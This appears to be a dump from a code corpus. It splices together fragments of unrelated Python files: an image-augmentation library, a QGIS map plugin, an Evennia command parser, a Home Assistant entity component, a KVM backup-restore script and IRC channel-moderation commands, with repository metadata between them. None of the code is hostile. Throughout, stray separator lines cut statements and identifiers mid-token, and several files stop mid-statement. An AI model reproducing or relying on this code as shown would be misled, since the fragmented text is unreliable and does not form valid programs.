from abc import ABCMeta, abstractmethod
import random
import numpy as np
import copy as copy_module
import re
import math
from scipy import misc, ndimage
from skimage import transform as tf, segmentation, measure
import itertools
import cv2
import six
import six.moves as sm
import types
"""
TODOs
- check if all get_parameters() implementations really return all parameters.
- Add Alpha augmenter
- Add WithChannels augmenter
- Add SpatialDropout augmenter
- Add CoarseDropout shortcut function
- Add Hue and Saturation augmenters
"""
@six.add_metaclass(ABCMeta)
class Augmenter(object):
"""Base class for Augmenter objects
Parameters
----------
name : string, optional
Name given to an Augmenter object
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
everytime
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, name=None, deterministic=False, random_state=None):
super(Augmenter, self).__init__()
if name is None:
self.name = "Unnamed%s" % (self.__class__.__name__,)
else:
self.name = name
self.deterministic = deterministic
if random_state is None:
if self.deterministic:
self.random_state = ia.new_random_state()
else:
self.random_state = ia.current_random_state()
elif isinstance(random_state, np.random.RandomState):
self.random_state = random_state
else:
self.random_state = np.random.RandomState(random_state)
self.activated = True
def augment_batches(self, batches, hooks=None):
"""Augment images, batch-wise
Parameters
----------
batches : array-like, shape = (num_samples, height, width, channels)
image batch to augment
hooks : optional(default=None)
HooksImages object to dynamically interfere with the Augmentation process
Returns
-------
augmented_batch : array-like, shape = (num_samples, height, width, channels)
corresponding batch of augmented images
"""
assert isinstance(batches, list)
return [self.augment_images(batch, hooks=hooks) for batch in batches]
def augment_image(self, image, hooks=None):
"""Augment a single image
Parameters
----------
image : array-like, shape = (height, width, channels)
The image to augment
hooks : optional(default=None)
HooksImages object to dynamically interfere with the Augmentation process
Returns
-------
img : array-like, shape = (height, width, channels)
The corresponding augmented image
"""
assert len(image.shape) == 3, "Expected image to have shape (height, width, channels), got shape %s." % (image.shape,)
return self.augment_images([image], hooks=hooks)[0]
def augment_images(self, images, parents=None, hooks=None):
"""Augment multiple images
Parameters
----------
images : array-like, shape = (num_samples, height, width, channels) or
a list of images (particularly useful for images of various
dimensions)
images to augment
parents : optional(default=None)
# TODO
hooks : optional(default=None)
HooksImages object to dynamically interfere with the Augmentation process
Returns
-------
images_result : array-like, shape = (num_samples, height, width, channels)
corresponding augmented images
"""
if self.deterministic:
state_orig = self.random_state.get_state()
if parents is None:
parents = []
if hooks is None:
hooks = ia.HooksImages()
|
if ia.is_np_array(images):
assert len(images.shape) == 4, "Expected 4d
|
array of form (N, height, width, channels), got shape %s." % (str(images.shape),)
assert images.dtype == np.uint8, "Expected dtype uint8 (with value range 0 to 255), got dtype %s." % (str(images.dtype),)
images_tf = images
elif ia.is_iterable(images):
if len(images) > 0:
assert all([len(image.shape) == 3 for image in images]), "Expected list of images with each image having shape (height, width, channels), got shapes %s." % ([image.shape for image in images],)
assert all([image.dtype == np.uint8 for image in images]), "Expected dtype uint8 (with value range 0 to 255), got dtypes %s." % ([str(image.dtype) for image in images],)
images_tf = list(images)
else:
raise Exception("Expected list/tuple of numpy arrays or one numpy array, got %s." % (type(images),))
if isinstance(images_tf, list):
images_copy = [np.copy(image) for image in images]
else:
images_copy = np.copy(images)
images_copy = hooks.preprocess(images_copy, augmenter=self, parents=parents)
if hooks.is_activated(images_copy, augmenter=self, parents=parents, default=self.activated):
if len(images) > 0:
images_result = self._augment_images(
images_copy,
random_state=ia.copy_random_state(self.random_state),
parents=parents,
hooks=hooks
)
self.random_state.uniform()
else:
images_result = images_copy
else:
images_result = images_copy
images_result = hooks.postprocess(images_result, augmenter=self, parents=parents)
if self.deterministic:
self.random_state.set_state(state_orig)
if isinstance(images_result, list):
assert all([image.dtype == np.uint8 for image in images_result]), "Expected list of dtype uint8 as augmenter result, got %s." % ([image.dtype for image in images_result],)
else:
assert images_result.dtype == np.uint8, "Expected dtype uint8 as augmenter result, got %s." % (images_result.dtype,)
return images_result
@abstractmethod
def _augment_images(self, images, random_state, parents, hooks):
raise NotImplementedError()
def augment_keypoints(self, keypoints_on_images, parents=None, hooks=None):
"""Augment image keypoints
Parameters
----------
keypoints_on_images : # TODO
parents : optional(default=None)
# TODO
hooks : optional(default=None)
HooksImages object to dynamically interfere with the Augmentation process
Returns
-------
keypoints_on_images_result : # TODO
"""
if self.deterministic:
state_orig = self.random_state.get_state()
if parents is None:
parents = []
if hooks is None:
hooks = ia.HooksKeypoints()
assert ia.is_iterable(keypoints_on_images)
assert all([isinstance(keypoints_on_image, ia.KeypointsOnImage) for keypoints_on_image in keypoints_on_images])
keypoints_on_images_copy = [keypoints_on_image.deepcopy() for keypoints_on_image in keypoints_on_images]
keypoints_on_images_copy = hooks.preprocess(keypoints_on_images_copy, augmenter=self, parents=parents)
if hooks.is_activated(keypoints_on_images_copy, augmenter=
|
alfanugraha/LUMENS-repo
|
processing/DockableMirrorMap/dockableMirrorMapPlugin.py
|
Python
|
gpl-2.0
| 8,306
| 0.032145
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
Name : Dockable MirrorMap
Description : Creates a dockable map canvas
Date : February 1, 2011
copyright : (C) 2011 by Giuseppe Sucameli (Faunalia)
email : brush.tyler@gmail.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qgis.core import *
from qgis.gui import *
import resources_rc
class Doc
|
kableMirrorMapPlugin:
def __init__(self, iface):
# Save a reference to the QGIS iface
self.iface = iface
def initGui(self):
self.dockableMirrors = []
self.lastDockableMirror = 0
self.dockableAction = QAction(QIcon(":/plugins/DockableMirrorMap/icons/dockablemirrormap.png"), "Dockable MirrorMap", self.i
|
face.mainWindow())
QObject.connect(self.dockableAction, SIGNAL("triggered()"), self.runDockableMirror)
self.aboutAction = QAction(QIcon(":/plugins/DockableMirrorMap/icons/about.png"), "About", self.iface.mainWindow())
QObject.connect(self.aboutAction, SIGNAL("triggered()"), self.about)
# Add to the plugin menu and toolbar
self.iface.addPluginToMenu("Dockable MirrorMap", self.dockableAction)
self.iface.addPluginToMenu("Dockable MirrorMap", self.aboutAction)
self.iface.addToolBarIcon(self.dockableAction)
QObject.connect(self.iface, SIGNAL("projectRead()"), self.onProjectLoaded)
QObject.connect(QgsProject.instance(), SIGNAL("writeProject(QDomDocument &)"), self.onWriteProject)
def unload(self):
QObject.disconnect(self.iface, SIGNAL("projectRead()"), self.onProjectLoaded)
QObject.disconnect(QgsProject.instance(), SIGNAL("writeProject(QDomDocument &)"), self.onWriteProject)
self.removeDockableMirrors()
# Remove the plugin
self.iface.removePluginMenu("Dockable MirrorMap",self.dockableAction)
self.iface.removePluginMenu("Dockable MirrorMap",self.aboutAction)
self.iface.removeToolBarIcon(self.dockableAction)
def about(self):
from DlgAbout import DlgAbout
DlgAbout(self.iface.mainWindow()).exec_()
def removeDockableMirrors(self):
for d in list(self.dockableMirrors):
d.close()
self.dockableMirrors = []
self.lastDockableMirror = 0
def runDockableMirror(self):
from dockableMirrorMap import DockableMirrorMap
wdg = DockableMirrorMap(self.iface.mainWindow(), self.iface)
minsize = wdg.minimumSize()
maxsize = wdg.maximumSize()
self.setupDockWidget(wdg)
self.addDockWidget(wdg)
wdg.setMinimumSize(minsize)
wdg.setMaximumSize(maxsize)
if wdg.isFloating():
wdg.move(50, 50) # move the widget to the center
def setupDockWidget(self, wdg):
othersize = QGridLayout().verticalSpacing()
if len(self.dockableMirrors) <= 0:
width = self.iface.mapCanvas().size().width()/2 - othersize
wdg.setLocation( Qt.RightDockWidgetArea )
wdg.setMinimumWidth( width )
wdg.setMaximumWidth( width )
elif len(self.dockableMirrors) == 1:
height = self.dockableMirrors[0].size().height()/2 - othersize/2
wdg.setLocation( Qt.RightDockWidgetArea )
wdg.setMinimumHeight( height )
wdg.setMaximumHeight( height )
elif len(self.dockableMirrors) == 2:
height = self.iface.mapCanvas().size().height()/2 - othersize/2
wdg.setLocation( Qt.BottomDockWidgetArea )
wdg.setMinimumHeight( height )
wdg.setMaximumHeight( height )
else:
wdg.setLocation( Qt.BottomDockWidgetArea )
wdg.setFloating( True )
def addDockWidget(self, wdg, position=None):
if position == None:
position = wdg.getLocation()
else:
wdg.setLocation( position )
mapCanvas = self.iface.mapCanvas()
oldSize = mapCanvas.size()
prevFlag = mapCanvas.renderFlag()
mapCanvas.setRenderFlag(False)
self.iface.addDockWidget(position, wdg)
wdg.setNumber( self.lastDockableMirror )
self.lastDockableMirror = self.lastDockableMirror+1
self.dockableMirrors.append( wdg )
QObject.connect(wdg, SIGNAL( "closed(PyQt_PyObject)" ), self.onCloseDockableMirror)
newSize = mapCanvas.size()
if newSize != oldSize:
# trick: update the canvas size
mapCanvas.resize(newSize.width() - 1, newSize.height())
mapCanvas.setRenderFlag(prevFlag)
mapCanvas.resize(newSize)
else:
mapCanvas.setRenderFlag(prevFlag)
def onCloseDockableMirror(self, wdg):
if self.dockableMirrors.count( wdg ) > 0:
self.dockableMirrors.remove( wdg )
if len(self.dockableMirrors) <= 0:
self.lastDockableMirror = 0
def onWriteProject(self, domproject):
if len(self.dockableMirrors) <= 0:
return
QgsProject.instance().writeEntry( "DockableMirrorMap", "/numMirrors", len(self.dockableMirrors) )
for i, dockwidget in enumerate(self.dockableMirrors):
# save position and geometry
floating = dockwidget.isFloating()
QgsProject.instance().writeEntry( "DockableMirrorMap", "/mirror%s/floating" % i, floating )
if floating:
position = "%s %s" % (dockwidget.pos().x(), dockwidget.pos().y())
else:
position = u"%s" % dockwidget.getLocation()
QgsProject.instance().writeEntry( "DockableMirrorMap", "/mirror%s/position" % i, str(position) )
size = "%s %s" % (dockwidget.size().width(), dockwidget.size().height())
QgsProject.instance().writeEntry( "DockableMirrorMap", "/mirror%s/size" % i, str(size) )
# save the layer list
layerIds = dockwidget.getMirror().getLayerSet()
QgsProject.instance().writeEntry( "DockableMirrorMap", "/mirror%s/layers" % i, layerIds )
scaleFactor = dockwidget.getMirror().scaleFactor.value()
QgsProject.instance().writeEntryDouble("DockableMirrorMap", "/mirror%s/scaleFactor" % i, scaleFactor)
def onProjectLoaded(self):
# restore mirrors?
num, ok = QgsProject.instance().readNumEntry("DockableMirrorMap", "/numMirrors")
if not ok or num <= 0:
return
# remove all mirrors
self.removeDockableMirrors()
mirror2lids = {}
# load mirrors
for i in range(num):
if num >= 2:
if i == 0:
prevFlag = self.iface.mapCanvas().renderFlag()
self.iface.mapCanvas().setRenderFlag(False)
elif i == num-1:
self.iface.mapCanvas().setRenderFlag(True)
from dockableMirrorMap import DockableMirrorMap
dockwidget = DockableMirrorMap(self.iface.mainWindow(), self.iface)
minsize = dockwidget.minimumSize()
maxsize = dockwidget.maximumSize()
# restore position
floating, ok = QgsProject.instance().readBoolEntry("DockableMirrorMap", "/mirror%s/floating" % i)
if ok:
dockwidget.setFloating( floating )
position, ok = QgsProject.instance().readEntry("DockableMirrorMap", "/mirror%s/position" % i)
if ok:
try:
if floating:
parts = position.split(" ")
if len(parts) >= 2:
dockwidget.move( int(parts[0]), int(parts[1]) )
else:
dockwidget.setLocation( int(position) )
except ValueError:
pass
# restore geometry
dockwidget.setFixedSize( dockwidget.geometry().width(), dockwidget.geometry().height() )
size, ok = QgsProject.instance().readEntry("DockableMirrorMap", "/mirror%s/size" % i)
if ok:
try:
parts = size.split(" ")
dockwidget.setFixedSize( int(parts[0]), int(parts[1]) )
except ValueError:
pass
scaleFactor, ok = QgsProject.instance().readDoubleEntry("DockableMirrorMap", "/mirror%s/scaleFactor" % i, 1.0)
if ok: dockwidget.getMirror().scaleFactor.setValue( scaleFactor )
# get layer list
layerIds, ok = QgsProject.instance().readListEntry("DockableMirrorMap", "/mirror%s/layers" % i)
if ok: dockwidget.getMirror().setLayerSet(
|
emergebtc/muddery
|
evennia/evennia/commands/default/muxcommand.py
|
Python
|
bsd-3-clause
| 8,473
| 0.002124
|
"""
The command template for the default MUX-style command set. There
is also an Player/OOC version that makes sure caller is a Player object.
"""
from evennia.utils import utils
from evennia.commands.command import Command
# limit symbol import for API
__all__ = ("MuxCommand", "MuxPlayerCommand")
class MuxCommand(Command):
"""
This sets up the basis for a MUX command. The idea
is that most other Mux-related commands should just
inherit from this and don't have to implement much
parsing of their own unless they do something particularly
advanced.
Note that the class's __doc__ string (this text) is
used by Evennia to create the automatic help entry for
the command, so make sure to document consistently here.
"""
def has_perm(self, srcobj):
"""
This is called by the cmdhandler to determine
if srcobj is allowed to execute this command.
We just show it here for completeness - we
are satisfied using the default check in Command.
"""
return super(MuxCommand, self).has_perm(srcobj)
def at_pre_cmd(self):
"""
This hook is called before self.parse() on all commands
"""
pass
def at_post_cmd(self):
"""
This hook is called after the command has finished executing
(after self.func()).
"""
pass
def parse(self):
"""
This method is called by the cmdhandler once the command name
has been identified. It creates a new set of member variables
that can be later accessed from self.func() (see below)
The following variables are available for our use when entering this
method (from the command definition, and assigned on the fly by the
cmdhandler):
self.key - the name of this command ('look')
self.aliases - the aliases of this cmd ('l')
self.permissions - permission string for this command
self.help_category - overall category of command
self.caller - the object calling this command
self.cmdstring - the actual command name used to call this
(this allows you to know which alias was used,
for example)
self.args - the raw input; everything following self.cmdstring.
self.cmdset - the cmdset from which this command was picked. Not
often used (useful for commands like 'help' or to
list all available commands etc)
self.obj - the object on which this command was defined. It is often
the same as self.caller.
A MUX command has the following possible syntax:
name[ with several words][/switch[/switch..]] arg1[,arg2,...] [[=|,] arg[,..]]
The 'name[ with several words]' part is already dealt with by the
cmdhandler at this point, and stored in self.cmdname (we don't use
it here). The rest of the command is stored in self.args, which can
start with the switch indicator /.
This parser breaks self.args into its constituents and stores them in the
following variables:
self.switches = [list of /switches (without the /)]
self.raw = This is the raw argument input, including switches
self.args = This is re-defined to be everything *except* the switches
self.lhs = Everything to the left of = (lhs:'left-hand side'). If
no = is found, this is identical to self.args.
self.rhs: Everything to the right of = (rhs:'right-hand side').
If no '=' is found, this is None.
self.lhslist - [self.lhs split into a list by comma]
self.rhslist - [list of self.rhs split into a list by comma]
self.arglist = [list of space-separated args (stripped, including '=' if it exists)]
All args and list members are stripped of excess whitespace around the
strings, but case is preserved.
"""
raw = self.args
args = raw.strip()
# split out switches
switches = []
if args and len(args) > 1 and args[0] == "/":
# we have a switch, or a set of switches. These end with a space.
#print "'%s'" % args
switches = args[1:].split(None, 1)
if len(switches) > 1:
switches, args = switches
switches = switches.split('/')
else:
args = ""
switches = switches[0].split('/')
arglist = [arg.strip() for arg in args.split()]
# check for arg1, arg2, ... = argA, argB, ... constructs
lhs, rhs = args, None
lhslist, rhslist = [arg.strip() for arg in args.split(',')], []
if args and '=' in args:
lhs, rhs = [arg.strip() for arg in args.split('=', 1)]
lhslist = [arg.strip() for arg in lhs.split(',')]
rhslist = [arg.strip() for arg in rhs.split(',')]
# save to object properties:
self.raw = raw
self.switches = switches
self.args = args.strip()
self.arglist = arglist
self.lhs = lhs
self.lhslist = lhslist
self.rhs = rhs
self.rhslist = rhslist
def func(self):
"""
This is the hook function that actually does all the work. It is called
by the cmdhandler right after self.parser() finishes, and so has access
to all the variables defined therein.
"""
# a simple test command to show the available properties
string = "-" * 50
string += "\n{w%s{n - Command variables from evennia:\n" % self.key
string += "-" * 50
string += "\nname of cmd (self.key): {w%s{n\n" % self.key
string += "cmd aliases (self.aliases): {w%s{n\n" % self.aliases
string += "cmd locks (self.locks): {w%s{n\n" % self.locks
string += "help category (self.help_category): {w%s{n\n" % self.help_category
string += "object calling (self.caller): {w%s{n\n" % self.caller
string += "object storing cmdset (self.obj): {w%s{n\n" % self.obj
string += "command string given (self.cmdstring): {w%s{n\n" % self.cmdstring
# show cmdset.key instead of cmdset to shorten output
string += utils.fill("current cmdset (self.cmdset): {w%s{n\n" % self.cmdset)
string += "\n" + "-" * 50
string += "\nVariables from MuxCommand baseclass\n"
string += "-" * 50
string += "\nraw argument (self.raw): {w%s{n \n" % self.raw
string += "cmd args (self.args): {w%s{n\n" % self.args
string += "cmd switches (self.switches): {w%s{n\n" % self.switches
|
string += "space-separated arg list (self.arglist): {w%s{n\n" % self.ar
|
glist
string += "lhs, left-hand side of '=' (self.lhs): {w%s{n\n" % self.lhs
string += "lhs, comma separated (self.lhslist): {w%s{n\n" % self.lhslist
string += "rhs, right-hand side of '=' (self.rhs): {w%s{n\n" % self.rhs
string += "rhs, comma separated (self.rhslist): {w%s{n\n" % self.rhslist
string += "-" * 50
self.caller.msg(string)
class MuxPlayerCommand(MuxCommand):
"""
This is an on-Player version of the MuxCommand. Since these commands sit
on Players rather than on Characters/Objects, we need to check
this in the parser.
Player commands are available also when puppeting a Character, it's
just that they are applied with a lower priority and are always
available, also when disconnected from a character (i.e. "ooc").
This class makes sure that caller is always a Player object, while
creating a new property "character" that is set only if a
character is actually attached to this Player and Session.
"""
def parse(self):
"""
We run the parent parser as usual, then fix the result
"""
super(MuxPlayerCommand, self).parse()
if utils.inherits_from(self.caller, "evennia.objects.objects.DefaultObject"):
# caller is an Object/Character
self.character = self.ca
|
tinloaf/home-assistant
|
homeassistant/helpers/entity_component.py
|
Python
|
apache-2.0
| 10,538
| 0
|
"""Helpers for components that manage entities."""
import asyncio
from datetime import timedelta
from itertools import chain
import logging
from homeassistant import config as conf_util
from homeassistant.setup import async_prepare_setup_platform
from homeassistant.const import (
ATTR_ENTITY_ID, CONF_SCAN_INTERVAL, CONF_ENTITY_NAMESPACE, MATCH_ALL)
from homeassistant.core import callback
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import config_per_platform, discovery
from homeassistant.helpers.service import extract_entity_ids
from homeassistant.loader import bind_hass
from homeassistant.util import slugify
from .entity_platform import EntityPlatform
DEFAULT_SCAN_INTERVAL = timedelta(seconds=15)
DATA_INSTANCES = 'entity_components'
@bind_hass
async def async_update_entity(hass, entity_id):
"""Trigger an update for an entity."""
domain = entity_id.split('.', 1)[0]
entity_comp = hass.data.get(DATA_INSTANCES, {}).get(domain)
if entity_comp is None:
logging.getLogger(__name__).warning(
'Forced update failed. Component for %s not loaded.', entity_id)
return
entity = entity_comp.get_entity(entity_id)
if entity is None:
logging.getLogger(__name__).warning(
'Forced update failed. Entity %s not found.', entity_id)
return
await entity.async_update_ha_state(True)
class EntityComponent:
"""The EntityComponent manages platforms that manages entities.
This class has the following responsibilities:
- Process the configuration and set up a platform based component.
- Manage the platforms and their entities.
- Help extract the entities from a service call.
- Maintain a group that tracks all platform entities.
- Listen for discovery events for platforms related to the domain.
"""
def __init__(self, logger, domain, hass,
scan_interval=DEFAULT_SCAN_INTERVAL, group_name=None):
"""Initialize an entity component."""
self.logger = logger
self.hass = hass
self.domain = domain
self.scan_interval = scan_interval
self.group_name = group_name
self.config = None
self._platforms = {
domain: self._async_init_entity_platform(domain, None)
}
self.async_add_entities = self._platforms[domain].async_add_entities
|
self.add_entities = self._platforms[domain].add_entities
hass.data.setdefault(DATA_INSTANCES, {})[domain] = self
@property
def entities(self):
"""Return an iterable that returns all entities."""
return chain.from_iterable(platform.entities.values() for platform
i
|
n self._platforms.values())
def get_entity(self, entity_id):
"""Get an entity."""
for platform in self._platforms.values():
entity = platform.entities.get(entity_id)
if entity is not None:
return entity
return None
def setup(self, config):
"""Set up a full entity component.
This doesn't block the executor to protect from deadlocks.
"""
self.hass.add_job(self.async_setup(config))
async def async_setup(self, config):
"""Set up a full entity component.
Loads the platforms from the config and will listen for supported
discovered platforms.
This method must be run in the event loop.
"""
self.config = config
# Look in config for Domain, Domain 2, Domain 3 etc and load them
tasks = []
for p_type, p_config in config_per_platform(config, self.domain):
tasks.append(self._async_setup_platform(p_type, p_config))
if tasks:
await asyncio.wait(tasks, loop=self.hass.loop)
# Generic discovery listener for loading platform dynamically
# Refer to: homeassistant.components.discovery.load_platform()
async def component_platform_discovered(platform, info):
"""Handle the loading of a platform."""
await self._async_setup_platform(platform, {}, info)
discovery.async_listen_platform(
self.hass, self.domain, component_platform_discovered)
async def async_setup_entry(self, config_entry):
"""Set up a config entry."""
platform_type = config_entry.domain
platform = await async_prepare_setup_platform(
self.hass, self.config, self.domain, platform_type)
if platform is None:
return False
key = config_entry.entry_id
if key in self._platforms:
raise ValueError('Config entry has already been setup!')
self._platforms[key] = self._async_init_entity_platform(
platform_type, platform,
scan_interval=getattr(platform, 'SCAN_INTERVAL', None),
)
return await self._platforms[key].async_setup_entry(config_entry)
async def async_unload_entry(self, config_entry):
"""Unload a config entry."""
key = config_entry.entry_id
platform = self._platforms.pop(key, None)
if platform is None:
raise ValueError('Config entry was never loaded!')
await platform.async_reset()
return True
@callback
def async_extract_from_service(self, service, expand_group=True):
"""Extract all known and available entities from a service call.
Will return all entities if no entities specified in call.
Will return an empty list if entities specified but unknown.
This method must be run in the event loop.
"""
data_ent_id = service.data.get(ATTR_ENTITY_ID)
if data_ent_id in (None, MATCH_ALL):
if data_ent_id is None:
self.logger.warning(
'Not passing an entity ID to a service to target all '
'entities is deprecated. Update your call to %s.%s to be '
'instead: entity_id: "*"', service.domain, service.service)
return [entity for entity in self.entities if entity.available]
entity_ids = set(extract_entity_ids(self.hass, service, expand_group))
return [entity for entity in self.entities
if entity.available and entity.entity_id in entity_ids]
@callback
def async_register_entity_service(self, name, schema, func):
"""Register an entity service."""
async def handle_service(call):
"""Handle the service."""
await self.hass.helpers.service.entity_service_call(
self._platforms.values(), func, call
)
self.hass.services.async_register(
self.domain, name, handle_service, schema)
async def _async_setup_platform(self, platform_type, platform_config,
discovery_info=None):
"""Set up a platform for this component."""
platform = await async_prepare_setup_platform(
self.hass, self.config, self.domain, platform_type)
if platform is None:
return
# Use config scan interval, fallback to platform if none set
scan_interval = platform_config.get(
CONF_SCAN_INTERVAL, getattr(platform, 'SCAN_INTERVAL', None))
entity_namespace = platform_config.get(CONF_ENTITY_NAMESPACE)
key = (platform_type, scan_interval, entity_namespace)
if key not in self._platforms:
self._platforms[key] = self._async_init_entity_platform(
platform_type, platform, scan_interval, entity_namespace
)
await self._platforms[key].async_setup(platform_config, discovery_info)
@callback
def _async_update_group(self):
"""Set up and/or update component group.
This method must be run in the event loop.
"""
if self.group_name is None:
return
ids = [entity.entity_id for entity in
sorted(self.entities,
key=lambda entity: entity.name or entity.entity_id)]
self.hass.async_create_task(
self.hass.services
|
tiagoprn/devops
|
shellscripts/kvm/restore_kvm_backup.py
|
Python
|
mit
| 3,178
| 0.002203
|
"""
Given a KVM machine description file, parse its XML
and change the contents of the nodes "name" and "disk/source.file".
Usage:
python restore_kvm_backup.py \
-x '/kvm/backups/centos7-06/kvm/backups/centos7-06/20180924.0850.23/config.xml' \
-b '/kvm/backups/centos7-06/kvm/backups/centos7-06/20180924.0850.23/centos7-06.qcow2' \
-n 'centos7-06' \
-i '/kvm/images/centos7-06.qcow2';
"""
import argparse
import os
import subprocess
import sys
import xml.etree.ElementTree as et
from time import sleep
cli_parser = argparse.ArgumentParser()
cli_parser.add_argument("-x", "--xml-file", required=True,
help="the backup kvm xml configuration file "
"containing the machine description.")
cli_parser.add_argument("-b", "--backup-image-file", required=True,
help="the full path to the qcow2 image file to be restored")
cli_parser.add_argument("-n", "--vm-name", required=True,
help="image name of the vm to show on make status")
cli_parser.add_argument("-i", "--destination-image-file", required=True,
help="the full path to where the qcow2 image must be restored")
args = vars(cli_parser.parse_args())
XML_FILE = args['xml_file']
VM_NAME = args['vm_name']
BACKUP_IMAGE_FILE = args['backup_image_file']
IMAGE_FILE = args['destination_image_file']
XML_RESTORATION_FILE = '/tmp/restoration.xml'
if not os.path.exists(XML_FILE):
print('The backup vm XML config file was not found, impossible to move on.')
sys.exit(1)
if not os.path.exists(BACKUP_IMAGE_FILE):
print('The backup image file was not found, impossible to move on.')
sys.exit(1)
def change_backup_xml_configuration_to_restore_vm():
tree = et.parse(XML_FILE)
root = tree.getroot()
for name in root.iter('name'):
name.text = VM_NAME
for disk in root.iter('disk'):
for child in disk:
if child.tag == 'source' and child.attrib['file'].endswith('qcow2'):
|
child.attrib['file'] = IMAGE_FILE
break
tree.write(XML_RESTORATION_FILE)
print('DONE. The new XML file you must use to restore your VM '
'is at {}.'.format(XML_RESTORATION_FILE))
if __name__ == "__main__":
print('Shutting down vm if it is active...')
subprocess.run(['sudo', 'virsh', 'shutdown', VM_NAME])
print('Removing existing vm...')
subprocess.run(['sudo',
|
'virsh', 'undefine', VM_NAME])
print('Removing disk for the existing vm...')
if os.path.exists(IMAGE_FILE):
os.unlink(IMAGE_FILE)
print('Changing backup kvm config to restoration...')
change_backup_xml_configuration_to_restore_vm()
print('Copying the backup disk as the vm disk...')
subprocess.run(['sudo', 'cp', '-farv', BACKUP_IMAGE_FILE, IMAGE_FILE])
print('Restoring vm to the backup image...')
subprocess.run(['sudo', 'virsh', '-c', 'qemu:///system', 'define', XML_RESTORATION_FILE])
print('Giving some time before starting the vm...')
sleep(5)
print('Starting the restored vm now...')
subprocess.run(['sudo', 'virsh', '-c', 'qemu:///system', 'start', VM_NAME])
print('DONE.')
|
Jakeable/Ralybot
|
plugins/admin_channel.py
|
Python
|
gpl-3.0
| 5,871
| 0.002555
|
from ralybot import hook
def mode_cmd(mode, text, text_inp, chan, conn, notice):
""" generic mode setting function """
split = text_inp.split(" ")
if split[0].startswith("#"):
channel = split[0]
target = split[1]
notice("Attempting to {} {} in {}...".format(text, target, channel))
conn.send("MODE {} {} {}".format(channel, mode, target))
else:
channel = chan
target = split[0]
notice("Attempting to {} {} in {}...".format(text, target, channel))
conn.send("MODE {} {} {}".format(channel, mode, target))
def mode_cmd_no_target(mode, text, text_inp, chan, conn, notice):
""" generic mode setting function without a target"""
split = text_inp.split(" ")
if split[0].startswith("#"):
channel = split[0]
notice("Attempting to {} {}...".format(text, channel))
conn.send("MODE {} {}".format(channel, mode))
else:
channel = chan
notice("Attempting to {} {}...".format(text, channel))
conn.send("MODE {} {}".format(channel, mode))
@hook.command(permissions=["op_ban", "op"])
def ban(text, conn, chan, notice):
"""[channel] <user> - bans <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("+b", "ban", text, chan, conn, notice)
@hook.command(permissions=["op_ban", "op"])
def unban(text, conn, chan, notice):
"""[channel] <user> - unbans <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("-b", "unban", text, chan, conn, notice)
@hook.command(permissions=["op_quiet", "op"])
def quiet(text, conn, chan, notice):
"""[channel] <user> - quiets <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("+q", "quiet", text, chan, conn, notice)
@hook.command(permissions=["op_quiet", "op"])
def unquiet(text, conn, chan, notice):
"""[channel] <user> - unquiets <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("-q", "unquiet", text, chan, conn, notice)
@hook.command(permissions=["op_voice", "op"])
def voice(text, conn, chan, notice):
"""[channel] <user> - voices <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("+v", "voice", text, chan, conn, notice)
@hook.command(permissions=["op_voice", "op"])
def devoice(text, conn, chan, notice):
"""[channel] <user> - devoices <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("-v", "devoice", text, chan, conn, notice)
@hook.command(permissions=["op_op", "op"])
def op(text, conn, chan, notice):
"""[channel] <user> - ops <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("+o", "op", text, chan, conn, notice)
@hook.command(permissions=["op_op", "op"])
def deop(text, conn, chan, notice):
"""[channel] <user> - deops <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("-o", "deop", text, chan, conn, notice)
@hook.command(permissions=["op_topic", "op"])
def topic(text, conn, chan):
"""[channel] <topic> - changes the topic to <topic> in [channel], or in the caller's channel
if no channel is specified"""
split = text.split(" ")
if split[0].startswith("#"):
message = " ".join(split[1:])
chan = split[0]
else:
|
message = " ".join(split)
conn.send("TOPIC
|
{} :{}".format(chan, message))
@hook.command(permissions=["op_kick", "op"])
def kick(text, chan, conn, notice):
"""[channel] <user> - kicks <user> from [channel], or from the caller's channel if no channel is specified"""
split = text.split(" ")
if split[0].startswith("#"):
channel = split[0]
target = split[1]
if len(split) > 2:
reason = " ".join(split[2:])
out = "KICK {} {}: {}".format(channel, target, reason)
else:
out = "KICK {} {}".format(channel, target)
else:
channel = chan
target = split[0]
if len(split) > 1:
reason = " ".join(split[1:])
out = "KICK {} {} :{}".format(channel, target, reason)
else:
out = "KICK {} {}".format(channel, target)
notice("Attempting to kick {} from {}...".format(target, channel))
conn.send(out)
@hook.command(permissions=["op_rem", "op"])
def remove(text, chan, conn):
"""[channel] <user> - force removes <user> from [channel], or in the caller's channel if no channel is specified"""
split = text.split(" ")
if split[0].startswith("#"):
message = " ".join(split[1:])
chan = split[0]
out = "REMOVE {} :{}".format(chan, message)
else:
message = " ".join(split)
out = "REMOVE {} :{}".format(chan, message)
conn.send(out)
@hook.command(permissions=["op_mute", "op"], autohelp=False)
def mute(text, conn, chan, notice):
"""[channel] - mutes [channel], or in the caller's channel if no channel is specified"""
mode_cmd_no_target("+m", "mute", text, chan, conn, notice)
@hook.command(permissions=["op_mute", "op"], autohelp=False)
def unmute(text, conn, chan, notice):
"""[channel] - unmutes [channel], or in the caller's channel if no channel is specified"""
mode_cmd_no_target("-m", "unmute", text, chan, conn, notice)
@hook.command(permissions=["op_lock", "op"], autohelp=False)
def lock(text, conn, chan, notice):
"""[channel] - locks [channel], or in the caller's channel if no channel is specified"""
mode_cmd_no_target("+i", "lock", text, chan, conn, notice)
@hook.command(permissions=["op_lock", "op"], autohelp=False)
def unlock(text, conn, chan, notice):
